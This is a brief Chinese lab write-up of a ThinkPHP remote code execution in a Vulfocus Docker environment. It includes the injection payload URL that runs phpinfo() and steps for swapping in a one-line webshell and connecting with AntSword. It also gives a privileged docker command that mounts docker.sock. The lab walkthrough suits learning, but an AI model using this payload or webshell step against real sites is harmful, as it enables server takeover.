thinkphp框架远程代码执行

凌晨五点的星2024-07-31 11:30

一、环境

vulfocus网上自行下载

启动命令:

复制代码 
 docker run -d --privileged -p 8081:80 -v /var/run/docker.sock:/var/run/docker.sock -e VUL_IP=192.168.131.144  8e55f85571c8

一定添加--privileged不然只能拉取环境首页不显示

二、thinkphp远程代码执行

首页:

先开始资产收集:

端口:

目录:

网上搜索历史cve

输入pyload

复制代码 
http://192.168.131.144:29319/index.php?s=/index/index/name/${@phpinfo()})

命令执行

使用bp抓包

替换成一句话木马

使用蚁剑去连接

相关推荐
浩浩测试一下2 分钟前
内网---> ForceChangePassword 权限滥用
java·服务器·网络·安全·web安全·网络安全·系统安全
爱思考的发菜_汽车网络信息安全17 分钟前
汽车网络安全:RSA算法详细解析
安全·web安全·汽车
汉堡包00112 小时前
【网安基础】--内网代理转发基本流程(正向与反向代理)
安全·web安全·php
lingggggaaaa16 小时前
安全工具篇&Go魔改二开&Fscan扫描&FRP代理&特征消除&新增扩展&打乱HASH
学习·安全·web安全·网络安全·golang·哈希算法
贾修行19 小时前
企业级网络安全架构实战:从防火墙部署到远程办公全解析
web安全·架构·智能路由器
模型时代21 小时前
Infosecurity Europe欧洲信息安全展将推出网络安全初创企业专区
安全·web安全·区块链
niaiheni1 天前
Log4j 漏洞深度分析:CVE-2021-44228 原理与本质
web安全·网络安全·log4j
Hubianji_091 天前
[IOS]2026年网络安全、通信技术与计算机科学国际会议(ACCTCS 2026)
计算机网络·安全·web安全·ios·国际会议·国际期刊
rockmelodies1 天前
Cybersecurity AI (CAI) AI 时代的网络安全自动化框架
人工智能·web安全·自动化
上海云盾-小余1 天前
高防 IP 详解:构建企业网络安全的第一道防线
网络协议·tcp/ip·web安全
热门推荐
01GitHub 镜像站点02Vue-skills的中文文档03一文了解国产算子编程语言 TileLang,TileLang 对国产开源生态的影响与启示04Claude Code Skills 实用使用手册05Claude Code + GLM4.7 避坑指南:解决 Unable to connect to Anthropic services06让 Trae IDE 智能体 “读懂”文档 Excel+PDF+DOCX :mcp-documents-reader 工具使用指南07UV安装并设置国内源08Linux下V2Ray安装配置指南09在Trae中使用Pencil MCP10OpenClaw Chrome扩展使用教程 - 浏览器中继控制